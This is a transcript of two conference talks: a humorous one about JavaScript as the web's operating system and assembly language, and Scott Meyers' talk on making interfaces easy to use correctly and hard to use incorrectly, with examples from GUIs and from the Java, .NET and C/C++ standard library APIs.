compile Hello World in C on JavaScript inside of a browser, which is awesome, but not deeply, deeply awesome. What would be really, really awesome would be opening up an iPhone emulator on Windows and then going into mobile Safari and then opening up JavaScript Linux within that and then compiling the C stuff inside of JavaScript, inside of Safari, inside of an emulator on a Windows machine running inside of a browser.
Because it's the Internet. So at this point I was thinking to myself, maybe JavaScript is useful. Maybe I can do something fun with JavaScript. I'm not really sure. So we would go and do these crazy things in JavaScript and ask ourselves, what else could we do? And then this might be the part where you think I'm going to talk about OpenGL and Clang and you're going to assume, I guess Scott's going to probably show me like Quake in the browser. Is this the part of the talk where Scott shows Quake in the browser? No. No, that would be lame. I know you've seen Quake in the browser and I'm not going to show it to you because Tom Cruise says no. So then I realized that if you take the characteristics of JavaScript and then overlay it around the characteristics of an operating system that you could argue, you could argue, that JavaScript is an operating system. And then we've got a virtual machine now that ships with our browsers that we can then target. JavaScript is a lot more sophisticated than I think we realize. It is so sophisticated that we could then invoke Atwood's law, which says that any application that can be written in JavaScript will eventually be written in JavaScript. So you've got more operating systems than you realize. You've actually got another operating system on your pocket supercomputer. You've got your pocket supercomputer. I think I've probably lost mine. So now I need to go and find my pocket supercomputer app. And within that, I've got iOS and then I've got mobile Safari, which is its own operating system. And then people say we should write all our apps in HTML5. That would be great. But then this guy says that that's a bad idea. He says that HTML5 was a mistake. I don't think that's really cool. I think that HTML5 is happening. I think that I want to use one of another quote from a famous philosopher that the avalanche has already begun. It's too late for the pebbles to vote. 
When I think about CEOs going, I don't know, do you really think HTML5 is going to happen? I'm not really sure. Think about what it would be like to be a pebble and the mountain is coming down on top of you. Like, I don't really like this avalanche. Let's have a vote about that. Anyone remember who this was, this famous philosopher? No? Kosh, thank you. Babylon 5. Who said that? Nicely done. I'm surprised that there weren't enough nerds to clearly come up with that. So when we say HTML5, though, really HTML is nothing, right? HTML is kind of just a toy. It's CSS and JavaScript and ultimately JavaScript that does all the work. And of course, there's a lot more stuff around that that really makes JavaScript and the web work. There was a time, though, when HTML was the most complicated thing that you could learn and you could get a job based entirely on knowing HTML tables. You could be a homeless person and someone could say, do you know HTML tables? Yeah, I do. Boom, you're a junior engineer. And then they would say, do you know row span? I do know row span. Senior engineer. I know that in Netscape 4, the maximum number of tables that you can have nested is 32. And the only way that you know that is writing 33 tables and nesting them. Now, HTML these days is simpler than ever, right? It's just the structure. CSS provides the color and then CSS is great. We all love CSS, right? CSS is intuitive. It's fun. It's easy to use. It works everywhere. It's a well understood specification that we can all count on across browsers and across systems. And it's just super fun to work with. And it makes us happy on a regular, regular basis. And of course, we use JavaScript for everything else. And JavaScript is great. Now, today's JavaScript, as I'm trying to teach this gentleman at Intel, is great because it's a big language and there's a lot of complicated stuff there, but we don't even need to learn the bad parts.
There's a book that just came out from John Resig, who wrote jQuery. And this is a great book called Secrets of the JavaScript Ninja. And the JavaScript Ninja book has a samurai on the cover because JavaScript is loosely typed. It doesn't really matter. Ninja, samurai. It's duck typing. That's a smattering of applause. No, I don't want your pity applause. If I can't earn it, I don't want it. So another one of our great philosophers once said that JavaScript is the assembly language of the web. Do you remember who that was? That was me. You're right. It was. But everyone else said it, too. It's just one of those things that you can't really take credit for because everybody said it. And people, when I said this, they thought that I was trolling. They thought I was trying to cause trouble and Reddit got involved and I don't like trolls. They just localized this talk. I can't do a Norwegian accent, so I will be alternating between French and Russian when I do Norwegian people. So I wanted to figure out if JavaScript was, in fact, the assembly language of the web. So I went and I asked Brendan Eich, who invented JavaScript, if, in fact, it was true. And actually, that is Brendan Fraser, the actor. This is Brendan Eich. But Brendan Fraser is a beautiful man. So let's just look at Brendan Fraser. And actually speaking of beautiful people, I should take this opportunity to thank some of the really great people that have helped me around my time on the web and around learning JavaScript, learning HTML. People like Brendan Eich, John Resig, Denise Jacobs, who you may have seen around. Rachel Reese, who's been speaking here, who's doing a great job. Paul Irish, super cool, super cool guy. Uncle Bob, I'm not sure if Uncle Bob made it here. And then, of course, Douglas Crockford, who's a really awesome guy. All these people have helped me in my quest to become better. I want to make sure that I don't let too many layers hide complexity.
This gentleman at Intel wanted to know if he should learn jQuery. And I was like, I don't know, if you add too many layers, you start to feel that you're slick and then something happens. And you don't want to try to be tricky. You try to be tricky, it's usually going to backfire on you. That's a great one. Let me see that one twice. Boom. So you could go and layer on top of all this JavaScript with a library like jQuery, but I don't think it's a good idea. Now, another famous quote is that no one writes JavaScript anymore, they just write jQuery. You know who said that, right? Jake Weary. Jake Weary actually said that. That is American actor Jake Weary. And then, of course, if you ever end up on the wrong page on Wikipedia, they will helpfully send you back there. Now, I don't know if you're familiar with Jake Weary. But here, let me fix that. There we go. Once you've learned that Jake Weary exists, I have ruined jQuery for you. You're never going to be able to go to work and talk about jQuery without thinking about Jake Weary. He's fantastic. Here's some of his work. I put this from IMDB. He was in Fred and Fred too, Night of the Living Fred. This is real. Escape from Polygamy and Zombeavers, which is currently in post-production. So you can tell Jake is going places. Now, when you write stuff though in jQuery, you get an image in your mind about what you're going to build. And you think, I'm going to build this amazing thing and it's going to be awesome. I'm going to do it in jQuery. And then I build it and it doesn't quite look the way that I wanted it to be. I don't really know, like, whose fault is that? I don't really know whose fault. What happened? I don't know. And then I feel sad. And then I'm like, I don't even know. So I think that more people should spend time learning vanilla.js. So I'm going to show you a little vanilla.js here, which is an amazing JavaScript library that I think is a little bit lighter weight than jQuery. The actor.
And if you go check out vanilla.js, it's a lightweight cross-platform framework. And basically it's a way to do cross-platform. You can go and say, I want animations and I want Ajax. I want math libraries. And it will go and generate a JavaScript package for you. Now, it's a little larger GZipped. Now, when you're doing this in development, this is your path to vanilla.js. And then when it's time to move to production, just remove that. And it works fantastic. If you did not get that joke, then you'll get that joke later. That was a just-in-time joke. And there's a bit of a delay. It's kind of a joke grenade that will detonate later. Actually, it took a buddy of mine three days to figure that one out. So God bless him. So I wanted my friend to understand that the power of the cloud means you can have any language that you want. And you've got massive scale and portability and elasticity. And on the browser, you have a lot more power than you realize. These are pocket supercomputers with multiple processors. And you've got this integrated virtual machine that requires no plugins. JavaScript is its own operating system. You can run that. You can target JavaScript and do all sorts of crazy stuff. And then effectively put the user's machine to work and have your cloud not working so hard. So I guess my message to you, as we get ready to hear from some more talented people than I, is that you are very, very powerful. Not just because you have Thor, but just in general, you are developers. You are powerful. You are not obsolete. I was worried about that one, but I'm glad that that, I'm glad that went over well. You're not obsolete. You're still making the hits years later, making the hits. You know the cloud and you program the browser. So my message to you is get to work. Thank you very much. Thank you.
Scott thought a talk on JavaScript would be more fun, and less productive. You can google for his Productivity talk if you like.
10.5446/50636 (DOI)
All right, well, welcome to the last session of the day. At least the last session of the day for me. I'm amazed that there's this many people at the end of the day. So if you just stumbled in here thinking, well, maybe this is a good place to rest, I'll try not to wake you. My name is Scott Meyers, and I want to talk about what I consider to be the single most important design guideline in software development. And I'll get right to it. The single most important design guideline, in my opinion, is to make interfaces easy to use correctly and hard to use incorrectly. Now, the reason I think it's the single most important design guideline is because this is not a user interface guideline. This is not an API guideline. This is both. It applies both to people implementing user interfaces, and it also applies to people who are implementing things that are being used by programmers, because there are a lot of interfaces in software. In fact, interface design in one form or another is one of the most common activities that we have as software developers. Now, often when people talk about interfaces, they're thinking about user interfaces. Could be a graphical user interface. Could be a gesture-based user interface. Could be a textual-based user interface. Those are all interfaces. But it also could be the kinds of interfaces that are used by software developers. So we have library interfaces. We have class interfaces. We have function interfaces. We have module interfaces. We have generic interfaces. We have template interfaces. There are lots and lots of interfaces. So a very common activity by software developers either is designing and implementing interfaces in one form or another, either for end users or for other developers or for both, or is consuming those interfaces, either as end users or as developers, people using APIs and things like that.
It is because interfaces, by the very nature of the word, are literally the way that we interact with part of a system. A well-designed interface can make things go really smoothly, can make it very satisfying, can make it a very pleasant experience, either as an end user or a programmer. And a poorly designed interface, either at the application level or at the user level, can make things a very miserable existence. Because it is so central to both using software and to developing software, this is why I think it is the single most important guideline that I know of. So I start as a point of departure with some assumptions. So the assumptions that I make are, first off, the people who are using software, either developers or end users, the first thing is they've used some software before. I think that's a reasonable assumption. They've interacted with some kind of a system before. So they have some idea what should be going on. The second thing is I believe that they are willing to read at least some documentation, not necessarily a lot of documentation. But they are willing to at least try to follow the rules. And most importantly, I believe that people who interact with interfaces, either as users or as developers, they want to succeed. They want things to work correctly. I do not know many software developers or many users who say, you know, I'm going to work today and I'm going to do a really bad job. My goal for today is to fail as many times as possible. I just don't think that's very common. So if these things are true, if people have some experience with software, if they're willing to read some documentation to figure out what the rules are, if they want to succeed, you can't ask them to bring anything more to the table. They're already pulling up their end of the bargain, which means if, for some reason, despite all these things, they use some software, they use an interface, and they fail. They do not do what they want to do.
It's not their fault. It's your fault. Or in particular, it is the interface developer's fault for having designed an interface that an experienced person, willing to read some documentation, who wants to succeed, failed to succeed at. That's the sign of a bad interface. So as a result, software should be easy to use correctly and it should be hard to use incorrectly. So if it is possible to perform an action, and by perform an action, I could mean do a gesture on some kind of a handheld device, or do something with a mouse or a keyboard, or type in some kind of commands, or call a function interface, or instantiate a class or a template. These are all acts of interacting with an interface. If it is possible to do something through the interface, it should almost always do what the person who's doing it wants it to. And if somebody could try to do something which would not yield the desired behavior, then that action should typically not even be possible. You want to have an interface that fulfills what Rico Mariani has called the pit of success. The pit of success is if you are doing something and you trip and you fall, you accidentally land doing something that you wanted to do. So if you accidentally succeed with an interface somehow, it means that it just does the right thing. Because the things that were not going to do the right thing aren't possible, and the things that are possible almost always do the right thing. That is the goal. What I want to do for the remainder of this presentation is try to give you more specific ideas on how you can implement easy to use correctly and hard to use incorrectly. I mean, it's one thing to say, well, this is what you should do, but the question is, how do you do it? What are the specific practices that you can adopt that will help make interfaces have this particular characteristic? And the first thing I want to talk about is adhering to what I call the principle of least astonishment.
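The "pit of success" Rico Mariani describes can be sketched in code: design a type so that the invalid state cannot be constructed at all, rather than documenting that callers shouldn't construct it. The following is a toy JavaScript sketch; the `DateRange` class and its names are hypothetical, invented here to illustrate the principle, not any real API.

```javascript
// A hypothetical DateRange that is hard to use incorrectly: the
// constructor rejects an end date before the start date, so no code
// downstream ever has to handle a backwards range.
class DateRange {
  constructor(start, end) {
    if (!(start instanceof Date) || !(end instanceof Date)) {
      throw new TypeError("start and end must be Dates");
    }
    if (end < start) {
      throw new RangeError("end must not be before start");
    }
    this.start = start;
    this.end = end;
  }
  days() {
    // Length of the range in whole days (millisecond difference / 1 day).
    return (this.end - this.start) / (24 * 60 * 60 * 1000);
  }
}

const ok = new DateRange(new Date("2014-06-01"), new Date("2014-06-08"));
console.log(ok.days()); // 7

// Falling into the pit of success: the mistake is impossible to make,
// not merely discouraged in the documentation.
try {
  new DateRange(new Date("2014-06-08"), new Date("2014-06-01"));
} catch (e) {
  console.log(e instanceof RangeError); // true
}
```

The design choice is the point: every function that receives a `DateRange` can assume it is valid, which shrinks the space of possible misuse for everyone downstream.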
Everybody who comes to an interface, they have some expectations. They have some background. They have some experience, which means that they have expectations about how that interface is going to work. So your job as an interface designer is to maximize the likelihood that their expectations are correct. In many cases, they're going to guess at how to use the interface. Your job is to maximize the likelihood that the guesses are going to be correct. And I want to emphasize again, this is not a user interface guideline. This is not an API guideline. This is for both kinds of interfaces. So this should be true across the board. So if users know what they want to do, then they should be able to figure out how to do it. Now, this doesn't mean there's no innovation in interfaces. So if you come up with some clever new way to let people accomplish a particular task that's better than previous ways of doing it, that's fine. Even if people don't know how to use it initially, once they've learned how to use it, they should go, oh, now I understand. And their expectations from that point forward should now be something which is going to make it easy to use correctly and hard to use incorrectly. So this does not mean you have to stick with old ideas for interfaces. But it does mean that once you've gotten across the basic ideas, people should be able to figure out how things work. Now, over the years, I have collected a large number of examples of either interfaces that work or more frequently interfaces that do not work. I'm going to be showing a lot of examples. Some of them will be user interfaces. Some of them are going to be APIs. Some of them are going to be relatively old. Some of them are going to be relatively new. So in this case here, I just want to talk about some basic ideas of avoiding astonishment. So as an example, a lot of people don't even think about it anymore. And now that we're at Windows 8, maybe it doesn't even work this way. 
But for many, many years, if you wanted to shut down your Windows computer, you would click on Start. Now, I have actually read the blog entry where they described how they did a lot of user testing and how they finally came up with the idea that clicking on Start was the right way to shut down the machine. This is stupid. Clicking on Start is not the right way to shut down the machine. And I've had to field more than my share of questions from people like my parents saying, so how do I shut down the machine? I'd say, you click on Start. And there's dead silence at the other end of the phone. No one wants to click on Start to stop something. I'm sorry, this does not make sense. Now, as I said, I read the blog entry describing how they came up with this. And what it boils down to was we tried a whole bunch of different approaches, and this one sucked the least. Guess what? Sucks least doesn't mean that is the best way to do things. So many, many years ago, and excuse me, I'm not a Mac user right now, but when I was using Macs from time to time, if you wanted to do things like get a DVD out of the drive or get a CD out of the drive, what you would do is you would drag it to the trash. Who thought this was a good idea? Who wanted to equate "destroy this forever" with ejecting it? Now, when I learned about this, which was a number of years ago, quite a number of years ago, I was in graduate school, you don't always trust your colleagues in graduate school. They don't always have your best interests at heart. So at one point, I said, OK, how do I get this out of the machine? And somebody said, you drag it to the trash. And I said, you are lying to me. It cannot possibly be true. Windows XP, which is going back a while, but there will be newer examples, I promise. Windows XP had the option that you could choose your font size. Now, there were two selections by the operating system for the font size in Windows XP. Two selections, they ship with Windows XP.
There was normal and large fonts. Those were your choices. And what I discovered one time, having tried to use large fonts, is large fonts breaks everything. Large fonts simply does not work. So I've got a couple of screenshots here. So you can see that, for example, in Excel, you'll notice that the baselines don't line up here. Notice the name of the band here, this is Sponge, but the descenders on the p and the g have been cut off, and the CD is cut off on the back here. Basically, nothing displays correctly with large fonts. Call me naive. I was astonished that using one of two choices for the operating system font size made everything display incorrectly. Now, maybe I'm a little bit too picky, but it seems to me that you shouldn't get 50% of the choices wrong. I mean, there's two choices. And what I found from talking to Windows developers was it was widespread acknowledgement that it just did not work. I want to point out now that I'm going to be giving lots of different examples. Every single example that I'm going to be giving you is the result of somebody who said, let's ship this software, this is ready to go. I mean, it's easy to pick on things that people throw together in their backyard. But for example, regardless of what you think of Microsoft and Windows, it is a professional software product that a lot of people spent money on. Somebody said, ship that baby, it's ready to go. Everything I'm going to be showing you here is the result of somebody saying, I now believe this is a professional software product that has the appropriate level of quality and which will satisfy our users. On this slide, we've only seen user interfaces. We're going to get to APIs, I promise. This is not the kind of problem that is limited to just user interfaces. So now let's deal more with a developer level kind of thing. So this happens to be an example from Qt 4.8. It's a GUI toolkit that can be installed on Windows.
And what it says is the install path must not contain any spaces. Really? On an operating system that by default has Program Files and My Documents, the installation path can't have any spaces? This is an example of people who develop some software on Unix, where spaces are legal but almost never used. And then they said, now we'll port it over to Windows and we will bring our collective Unix baggage with us and we will then impose it on all our users. Now it goes the other direction as well. For example, it is not uncommon for people to take Windows software which is not case sensitive and then port it over to Unix and suddenly guess what? Everything starts breaking because it is case sensitive. When you move from one environment to another environment, the expectations that people have are going to change, which means what it means to make things easy to use correctly and hard to use incorrectly is going to change as well. You can't simply take your conception of what's a good idea and move it someplace else and expect that community of people to adapt to your way of doing things. You have to adapt to their way of doing things. Someone sent me this and it's so wonderful that I don't think anybody is ever going to beat this for the worst possible user interface design. Now this happens to be a calendar program. Oh, it's worse than you think. So this happens to be a calendar program. So if you have a recurring meeting on your calendar, like every Monday we have a meeting. And then let's suppose on some Monday you don't want to have the meeting. Maybe you're going to be on vacation. Maybe it's a holiday. Maybe the meeting got canceled for some other reason. So what you say is great. I want to delete the meeting. Now when you say that you want to delete the meeting, there's actually some inherent ambiguity here because you could be saying, I want to delete the meeting forever. We don't ever need to have it again. It's moved to Tuesdays.
Or you could be saying, no, this one particular Monday is the day that it needs to go away. So all right, there needs to be some way to disambiguate between the two. So as you can see here, it says delete this single item. No to delete all. Now without even going any further, I have no idea what that means. So that's no to delete all, followed by, um, abzubrechen, tippen Sie auf x. And then two choices, Ja and Nein. You know, I didn't know what it meant in English. And putting it in German is not improving matters any. But I want to point out, professional software. Somebody shipped this, they thought this would be a great way to satisfy their customers. I'd call that fairly astonishing. So there are some things you can do to avoid astonishing people. One of the things is you want to avoid gratuitous incompatibilities with the surrounding environment. People are working in some environment, some kind of a social environment, some kind of a computational environment, some kind of a community environment. They have expectations, they have normal standard practices. Your goal is to seamlessly work with those things that people are already used to doing. Basically, you want to take advantage of what people already know. That makes it easier for them to use your software. Again, whether they're end users or whether they're API users, as long as people's habits and expectations correspond to what should be done, you will have a higher rate of success with people doing things correctly. Now, the natural syntax for doing these things can vary depending on the environment. So for example, if I want to find out whether two objects in a programming language have the same value, it's a reasonable thing to want: does this thing have the same value as this thing? But the way that you say that depends on the programming environment that you're dealing with. So for example, in C++, you use operator==, that's what is used in that programming language.
Now, in Java, you use equals with a lower case e. And in C#, you use both Equals with an upper case E and operator==. So the way that you accomplish the same thing depends on the particular community that you are targeting. So this is why you need to adapt what you are doing to the community of people who are going to be using it. You also want to offer intuitive semantics. What I normally tell people is, if there's not a good reason to diverge from what people are used to, then you want to do what people are used to. So in C++ or other languages, when in doubt, do as the ints do. Everybody knows how an int behaves. So if you don't have a good reason for your type to not behave like an int, make it behave like an int. People know what that means. In GUIs, if you have mouse clicks or you have gestures, make those things mean whatever they normally mean in other programs that people use. Don't come up with your own special way of doing things unless there's a particular advantage associated with doing that. Again, I don't want to rule out interface innovation. That's clearly something we need to be able to experiment with. But in some cases, people just change things because they can change things and there's no obvious advantage. And that to me is a good way to astonish people. Anybody who is a software developer, anybody who is a programmer, at some point early in their career, early in their education, they were told, you need to choose good names. You've got to choose really good names. It's the most important thing, choose really good names. And every single person who has been given this advice has learned that all the good names were taken in the 1960s. There are no good names left. And yet, that's no excuse because names are, especially for APIs, they literally are the interface. The very first thing people see when they're dealing with an API are things like class names, module names, function names.
The minute they see a word, they are going to go, oh, and an idea is going to spring to mind. And if the idea that springs to mind is not the right idea, you are going to be fighting them every step of the way because they have the wrong conception of what is going on. So it actually is really important to choose good names. And it's very hard. One of the reasons it's hard is because all the good names were taken in the 60s. But the second thing is there are so many things that have to be named. I mean, choosing one good name is hard. But we have to do things like choose names for libraries, modules, namespaces, generics. I'm not going to read the whole slide to you, but that's a lot of things that need names. Every one of them is supposed to be a good name. If all you did was pick names all day long, you'd go crazy. And yet, the fact that it's hard doesn't change. It's the fact that that is literally the interface for any kind of text-based system. The commands that people type on Unix, which is not setting any records in terms of beauty, the kinds of things people type in APIs, library names, commands to programs, the names are the interface for those kinds of interfaces. And to say things like, well, people will get used to it. Yeah, they will get used to it. But they'll make a lot of mistakes along the way. So it really is important to choose good names. I know it's hard. Doesn't mean it's not something we should all be aspiring to all the time. So here's a couple of counter examples. So this one happens to be from Adobe Acrobat 9, but it's actually standard for the Windows platform. So basically, let's suppose I create a document, I do some edits to it, and then I want to close the program without saving it. So now I have a document that's about to be destroyed without being saved. So the program thinks, all right, we should probably warn you about this. So what it says is, do you want to save the changes to the document? Yes, I know what that means. 
No, I know what that means. Cancel, I never have any idea what that means. I have to always think and go, what's the difference between no and cancel again? And I go, all right, cancel means I actually want to cancel the request to close the program. So that doesn't help me too much. But that's OK. We have interface innovation. So OpenOffice, I downloaded the most recent version of that. OpenOffice, not constrained to do things like everybody else does. If you do the same thing in OpenOffice, it asks you the same question. So, do you want to save the doc... what does it say? Do you want to save your changes? Well, it doesn't have yes, no, and cancel. That's too complicated. It has save. Well, I actually knew what yes meant, so that doesn't help me too much. And then it has discard. Well, OK, but I knew what no meant. And then we have cancel. That's what I had trouble with in the first place. So it's different, but I don't happen to think it's any better. Now, there is this notion in the interface community of what is known as the Gulf of Execution. The Gulf of Execution is the distance between conceptually what I wish to be able to do and the means I have to take in order to get it done. The distance between what I want to express and the way that I go about expressing that. And so anytime the Gulf of Execution is large, it increases the likelihood that somebody's going to do the wrong kind of thing. So for example, somebody might click on either discard or no when they should have clicked on cancel, because they really didn't want to lose the document. It is interesting from time to time to think about how we could avoid the problem. As an example, one could imagine that rather than even presenting this dialog in the first place, if you try to exit a program and you hadn't saved the document, automatically it would just be saved behind the scenes. You wouldn't have been asked, it would just be there.
And then we'd have to have some kind of interface that would let people go, oh, right, I wanted that document. Oh, you saved it for me? That's so nice. Why don't you give it to me? Other interface questions come up, but the point is that there are other ways to approach the problem. For example, rather than saying, I'm about to throw your document away, how about don't throw the document away? And then as I said, there has to be some other kind of interface which would let us get back at those kinds of old documents. But by trying to reduce the gulf of execution between, oh, I just want to get out of the program, and, I'm about to throw a bunch of work away, by adopting a different approach, we can possibly lessen that tension. The other thing I would ask about this particular kind of thing, and this is designed for a desktop environment, so this is not designed for a small screen, is I'm trying to figure out why it is that in 2014, when we have these giant monitors with huge numbers of pixels, we're still following the convention that we can't have more than one short word on the button. For example, instead of cancel, something like don't exit program, I bet that would fit, in which case a lot of the confusion about what it means would go away as well. So this is an example of an interface in my mind that was designed in the late 1990s and has not been updated since then. So we've seen too many GUI examples, let's talk a little bit about API examples, and this has to do again with choosing good names. Now, in the C++ standard library, there are two different ways to determine if objects are the same. One of them is called equality, one of them is called equivalence, doesn't even matter what the difference is. But the point is, there's two ways to say, is this object equal to this object? There's two ways to say that. One of them is to use equality and one of them is to use equivalence. So it turns out that they have a function called equal_range.
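The "save behind the scenes instead of asking" alternative can be sketched in a few lines. This is a toy JavaScript sketch with invented names (`draftStore`, `closeDocument`, `recoverDraft`); a real editor would persist to disk and need the recovery interface the talk mentions, but the shape of the idea is this:

```javascript
// Sketch: instead of a Yes/No/Cancel dialog on exit, stash unsaved work
// automatically and let the user recover it later. All names here are
// hypothetical, for illustration only.
const draftStore = new Map(); // stands in for disk or local storage

function closeDocument(doc) {
  if (doc.dirty) {
    // No dialog, no gulf of execution: the work is simply kept.
    draftStore.set(doc.name, doc.contents);
  }
  // ...then release resources, close the window, etc.
}

function recoverDraft(name) {
  return draftStore.get(name); // undefined if nothing was stashed
}

closeDocument({ name: "report.txt", contents: "Q2 numbers...", dirty: true });
console.log(recoverDraft("report.txt")); // "Q2 numbers..."
```

The trade-off, as the talk notes, is that the dialog's complexity doesn't vanish; it moves into a recovery interface, which the user only meets when they actually need it.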
It takes a bunch of objects in a range and says, I want you to bunch all of them together whose values are equivalent. So the name of the function is equal_range, but it doesn't use equality. It uses equivalence, and it does make a difference sometimes. And people do get misled into thinking, oh, now I have all the values that are equal to something else, but actually they don't. They have the values that are equivalent to something else, not always the same. So the question really is, why did they call it equal_range and not equivalent_range, since it's not using equality? Another thing you can do to avoid astonishing people, one of the most important things is, you can embrace consistency. You can have consistency in the wording that you use, in the way that you lay things out, in the way you report errors, things like that. So this is an example that was sent to me a while ago. This happens to be from an ATM. And what you will notice in this ATM is that there's two things you can deposit. You can do a cash deposit and you can do a check deposit. Notice that on the screen, the cash deposit's on the left and the check deposit's on the right. And now notice that underneath, where you actually do the depositing, the cash deposit is on the right and the check deposit is on the left. Or as I like to say, you know, they had a 50% chance of getting it right, which means they had a 100% chance of getting it wrong. But, I mean, this was only rolled out to probably tens of thousands of places around the world. So, really? I mean, is that so complicated to make sure that things are consistent in terms of their visual, their spatial layout? Also, in terms of consistency, in Java, if you would like to find out how many elements are in a container, there's three ways to do it. So, if you have an array, use the length property. If you have a string, use the length method. And if you have a list, use the size method. Three different ways to get the same kind of information.
That's Java. So, Microsoft looked at Java and said, man, this is crazy. Three different ways to get the same information. What kind of loser company would have three ways to get the same information? So, when they invented .NET, they said, we will not have three ways to get the same information. We'll have two. So, if you want to know how many elements are in a container, you have the Length property for arrays, and you have the Count property for ArrayList. You also have a Count method on IEnumerable. Pardon me? You also have a Count method on IEnumerable, so it's actually the same. I'm sorry, one more time? The Count method also exists. On what? On IEnumerable. Oh, Count method or Count property? Method. OK, all right. So, on IEnumerable, then, so there actually are three different ways? Cool. I'll just make a little note here. You think I'm making it up? IEnumerable? Count method. OK, remember, professional released software products. These are people who are doing the best that they possibly can. But that notwithstanding, we have a situation now. Sometimes when I talk to people, they say, look, you know, especially in .NET, everybody's using Visual Studio, and it's got completion, so all you have to do is type the first letter of the method name or the property name. It'll tell you what it happens to be. So my first observation is, number one, L and C are not the same letter. So you actually have to find out what that's going to be. The other thing is this makes the assumption that you're always using an IDE. But these kinds of languages also have reflection-based code. With reflection-based code, you can actually be generating and processing code at runtime. And guess what? At runtime, there's no IDE. Instead, what you have to do is take a look at something and then query its interface to find out what kinds of things it supports. And guess what? That querying becomes a lot more complicated and error-prone if you have to check for two or three different possibilities. 
So the excuse of, well, we have an environment that makes these problems go away, bad news. It doesn't make the problems go away. It might reduce the severity in some cases, but it doesn't solve them completely. Again, on the topic of consistency, this is from the C standard library. So we have three different functions here. We've got fscanf, we have fgetpos, and we have fseek. Notice that all three of them take a file pointer parameter as the first parameter. All right, so we notice a pattern here. When you're dealing with files, you will pass in a file pointer as the first parameter. All right, that's easy to remember. Oh, wait. It turns out there's also fgets, fputc, and freopen. They take a file pointer as the last parameter. I have talked to several extremely experienced C programmers, people who do this for a living. They've done it for decades. And they will all say they have to look it up every single time. I mean, they simply cannot memorize this stuff. And there's a lovely quote here, something which I think is important to keep in mind: this inconsistency has frustrated millions of developers for more than 30 years. And the reason I point this out is, if you are involved in the development of an interface that is so successful that it is used by millions of people for decades, wouldn't it be nice if one of the things that it is remembered for is how easy it was to use and how you didn't have to look up the details every single time you wanted to use it? Now, most of us will never be sufficiently lucky to develop an interface that has that kind of widespread use. But shouldn't you aspire to something which can stand the test of time and which people are going to look back on and say, you know, that was a really nice interface? As opposed to, I had to look it up every single time I wanted to make a function call. It's kind of crazy. So this is a different kind of consistency. This is from the C++ standard library. 
And again, I'm trying to mix up API things and GUI things. There's a number of standard containers in the C++ standard library. So let's suppose you have a container. And what you want to do is you want to get rid of all the elements of the container that have a particular value. I want to get rid of all the 10s. Or I want to get rid of, I don't know, all the colors that are blue, whatever it happens to be. So if it's a set, you call erase. If it's a multi-set, you call erase. If it's a map, if it's a multi-map, you call erase. If it's an unordered set, unordered multi-set, unordered map, unordered multi-map, you call erase. I'm beginning to notice a trend here. If it's a list, you call remove. And if it's a forward list, you call remove. By the way, they do exactly the same operation. They're just named differently. And what's important to notice about these kinds of examples, the thing about consistency, usually things that are inconsistent, it's an utterly arbitrary decision. You cannot argue that these names had to be different for some compelling technical reason. They're just different because they probably were developed independently. And then when somebody noticed that they were inconsistent, they didn't bother to fix it. They didn't say, now, now, before we standardize this, let's make sure that they actually behave in a consistent fashion. So some problems have technical justifications. This is not one of them. I've talked about consistency in layout, spatially in a GUI, for example. I've talked about consistency in terms of calling forms. But there's a different kind of consistency I want to mention now because consistency is across the board. It should occur in many different domains. So again, this is from the C++ standard library. So there is a function sort. If you call sort on a collection of values, either it will sort it in n log n time or it will not compile. 
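Backing up to the erase-versus-remove point for a moment, here is a minimal sketch (the overloaded helper name is mine, for illustration) of the same "drop every element with this value" operation spelled two different ways:

```cpp
#include <list>
#include <set>

// The same operation -- get rid of every element with a given value --
// but the associative containers name it erase while the lists name it
// remove. The overloads below do identical jobs on their containers.
inline void dropAll(std::multiset<int>& ms, int v) { ms.erase(v); }
inline void dropAll(std::list<int>& lst, int v)    { lst.remove(v); }
```

Calling dropAll with the value 10 on a multiset {10, 3, 10} or a list {10, 3, 10} leaves one element in each; only the member function's name differs.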
So for example, if you have a doubly linked list, which cannot be sorted using this algorithm in n log n time, and you try to sort the doubly linked list, it will not compile. So the philosophy there is if we can't do this efficiently, we won't even support it. Your program won't compile. That's the philosophy. Now, there is another function. It's called binary search. Binary search in the same standard library. It will run in log n time, which is what you'd expect from binary search if it can. And if it can't run in log n time, it will run in linear time. You can invoke binary search on a linked list. This is an inconsistency in philosophy because this philosophy says if there's any way to do this, we will do it, even if it's really slow. But what that means for the library as a whole is that your typical developer working in C++, when they make a function call, doesn't know if it's going to compile. And if it does compile, they don't know if it's going to be fast or slow in general. Because the people designing the library didn't have a consistent set of philosophies about what it would mean to have performance guarantees. So this is not a syntactic constraint. This is more of a philosophical conceptual inconsistency. And that kind of inconsistency is no better or worse than any other kind of inconsistency. Another thing from the C++ standard library, and some of you may not know, that I sort of live in the C++ world. So that's why some of the examples are coming from that. There is a function called sort. When you sort values, the sort technique can either be stable or unstable. It doesn't matter what the words mean. But the point is there's two ways to do it, stable or unstable. The sort algorithm is not guaranteed to be stable. But that's OK. If you need stability, there's another algorithm. Stable sort, which is guaranteed to be stable. Well, this makes sense so far. Sort, not guaranteed to be stable. Stable sort, guaranteed to be stable. 
However, there is also a special algorithm for sorting doubly linked lists. It is called sort, and it's guaranteed to be stable. So we've now talked about consistency. We've talked about avoiding surprising people. I want to now talk a little bit about progressive disclosure. Remember, the high level goal we're trying to achieve here is interfaces that are easy to use correctly and hard to use incorrectly. When you get to an interface of a particular level of complexity, and again, whether it's a user interface or an API, once there are a whole bunch of choices that people can make, a whole bunch of possible things they can do, the likelihood of them doing the wrong thing increases. If you're faced with a whole wall of buttons, the chances of hitting the wrong button go up. So what we'd like to do is find a way to reduce the likelihood that people are going to hit the wrong button. And one of the ways to do that is what is known as progressive disclosure. What progressive disclosure does is it says, listen, of all these choices that people have, of all the things that they could do, these are the ones they probably want to do, and these are the ones that they are much less likely to want to do. Now, we need to make all of them available all the time, but what we can do is make it easy to hit the buttons or use the levers that we want people to use, because it's likely to be what they want, and harder to use it some other ones. So what you can do is distinguish normal from expert or advanced level kinds of commands. So this is something that happens to be from the most recent version of Firefox, but you've got some choices here, but notice there's an advanced button, and when you click on the advanced button, it brings up a whole bunch more options. The idea here is that for most people when they're in, well, which section is this? Content, it looks like. 
